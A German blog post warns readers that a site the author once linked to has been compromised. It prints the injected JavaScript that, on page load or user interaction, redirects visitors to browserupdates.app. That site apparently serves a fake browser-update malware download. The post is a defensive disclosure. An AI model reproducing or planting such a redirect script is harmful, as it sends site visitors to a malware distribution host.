Hadmut Danisch
Ansichten eines Informatikers

Malware-Warnung

Hadmut
25.11.2025 20:59
Uncategorized

Ein hochaktueller Dauerhinweis.

Ein Leser schrieb mich an. Sein Virenscanner habe auf einer Seite Alarm geschlagen, auf die ich auch schon mal verlinkt hätte. Die hätten, ganz am Ende des Textes, eine fiese Sache drin, würden auf eine Seite redirecten, die einem Malware unterjubelt.

Ich habe es mir mal angesehen.

Tatsächlich steht am Ende schon von deren Eingangsseite ein JavaScript-Stück wie:


function () {
        var targetUrl        = "https:\/\/browserupdates.app\/";
        var delayMs          = 1000;
        var cooldownMinutes  = 10;

        function setCooldownCookie() {
            var d = new Date();
            d.setTime(d.getTime() + (cooldownMinutes * 60 * 1000));
            var expires = "expires=" + d.toUTCString();
            document.cookie = "trafic_redirect_cooldown=1;" + expires + ";path=/";
        }

        var timerStarted = false;

        function startTimer() {
            if (timerStarted) return;
            timerStarted = true;

            setTimeout(function () {
                setCooldownCookie();
                window.location.href = targetUrl;
            }, delayMs);
        }

        var events = ['click', 'scroll', 'mousemove', 'keydown', 'touchstart', 'touchmove'];

        events.forEach(function (evt) {
            window.addEventListener(evt, startTimer, { passive: true });
        });

        window.addEventListener('load', function () {
            setTimeout(startTimer, delayMs);
        }

Ich bin nicht so der JavaScript-Guru, ich mag die Sprache nicht und verwende sie auch nur selten und wenn nötig, und muss die genauen Details von Funktionsaufrufen dann auch jedes Mal erst nachschauen. Sie setzen, wenn die Seite geladen ist, oder wenn bestimmte Aktionen erfolgen einen Timer auf 1000 Millisekunden und laden eine Seite, die als Malwareseite berücksichtigt ist. Angeblich – ich habe es nicht ausprobiert – bekommt man von dort, wenn sie einem den Browser nicht gleich hacken, eine Meldung, der Browser sei veraltet, mal solle – klicken Sie hier! – einen neue Version installieren und bekäme dann eine Malware-Version.

Mir ist allerdings nicht klar, wofür sie das Cookie setzen, obwohl man aus dem Namen raten kann, wofür es gedacht ist, weil ich nicht sehe, wo sie das auslesen und verwenden. Irgendwas, worauf andere Software reinfällt, kann es wohl wegen des Schreibfehlers auch nicht sein.

Bevor ich die Seite jetzt aber als Malware-Schleuder hinstelle, habe ich die Redaktion erst einmal angeschrieben und um Stellungnahme gebeten.

Antwort: Wissen wir, wir arbeiten mit Hochdruck dran.

Scheint keine Absicht zu sein. Hört sich eher an, als seien sie gehackt worden, oder habe ihnen ihr Werbedienstleister das eingeschleppt. Ich würde in so einem Fall aber erwarten, dass man die Seite abschaltet, bis man das geklärt und rausgeworfen hat.

Deshalb aber die grundsätzliche Warnung: Fallt nicht darauf herein, wenn Euch irgendwelche Webseiten irgendwas anzeigen, auch wenn es wie eine Meldung des Browsers selbst aussieht, dass Euer Browser (oder was auch immer) veraltet sei und dringend ein Update brauche, klicken Sie hier!